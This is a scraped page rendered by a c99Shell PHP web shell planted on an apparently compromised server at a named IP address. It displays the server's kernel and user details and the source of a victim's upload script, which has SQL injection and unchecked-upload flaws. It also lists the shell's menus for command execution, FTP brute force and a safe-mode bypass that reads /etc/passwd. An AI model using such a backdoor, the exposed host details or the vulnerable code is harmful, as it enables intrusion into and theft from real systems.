110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/Research_depart/ drwxr-xr-x Free 52.64 GB of 127.8 GB (41.19%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/Research_depart/ drwxr-xr-x
Free 52.64 GB of 127.8 GB (41.19%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: InsertDownload.php (3.4 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

";
		echo "

ЎГШіТ·УЎТГ Login ЎиН№
";
		echo "";
		exit();
	} 
	else {
      	/**  Configuration  */
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
		require_once( "../include/Function.php" );
	    require_once( "../includes/FunctionDB.php" );
	
	/**  Create Database Object  */
		$dbObj = new DBConn;

		//=== SESSION
		$Username = $valid_user; 
		
		
		
		//###  ГСє¤иТЁТЎ Form
     $Category  = htmlspecialchars(trim($_POST['Category']));		
     $Agency = htmlspecialchars(trim($_POST['Agency']));
     $Name_info  = htmlspecialchars(trim($_POST['Name_info']));
	 $DateYear = dmyE2ymdT($_REQUEST["mDate"]);

     $Path = "../Research_pic"; 
        //###  Upload Text File  -----*//
		if( $_FILES['Filetex']['name'] != "" ) {
			$Filetex = date('YmdHis').strrchr($_FILES['Filetex']['name'], ".");
			@copy( $_FILES['Filetex']['tmp_name'] , $ResearchPicPath.$Filetex);
			@unlink( $_FILES['Filetex']['tmp_name'] );
		}
		   $sql = "SELECT * FROM    research_download   WHERE    dowId ='$dowId'   and  Research_code='$Research_code'  ";
		   $result1 = mysql_query($sql);
		   $num_rows = mysql_num_rows($result1);
		   
		   if($num_rows){
			    if($Filetex){
				 $query1 = " UPDATE   research_download   SET   Research_Id='$Research_Id' ,  Research_code='$Research_code' , CatId ='$CatId' , Agency='$Agency' , Name_info='$Name_info' , DateYear='$DateYear' , academic_year_finish ='$academic_year_finish',  Filetex ='$Filetex'   WHERE    dowId ='$dowId'   and  Research_code='$Research_code'   ";  
			    	}
				else{
				 $query1 = " UPDATE research_download   SET  Research_Id='$Research_Id' ,  Research_code='$Research_code' , CatId ='$CatId' , Agency='$Agency' , Name_info='$Name_info' , DateYear='$DateYear' , academic_year_finish ='$academic_year_finish'    WHERE    dowId ='$dowId'  and  Research_code='$Research_code'   ";
			     }
					$result1 = $dbObj->runQuery($query1);
		    		$dbObj->freeresult($result1);
		     	   }
		       	else{
				 InsertDownload ($Research_Id, $Research_code, $CatId , $Agency , $Name_info , $DateYear, $academic_year_finish, $Filetex ) ;
			      }
		   	       		
			$dbObj->disconn();
				unset($dbObj);
				echo ""; 
                echo "";
			    echo "";
				exit();
		 
		} # else
		
	?>





-








bool(false)

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--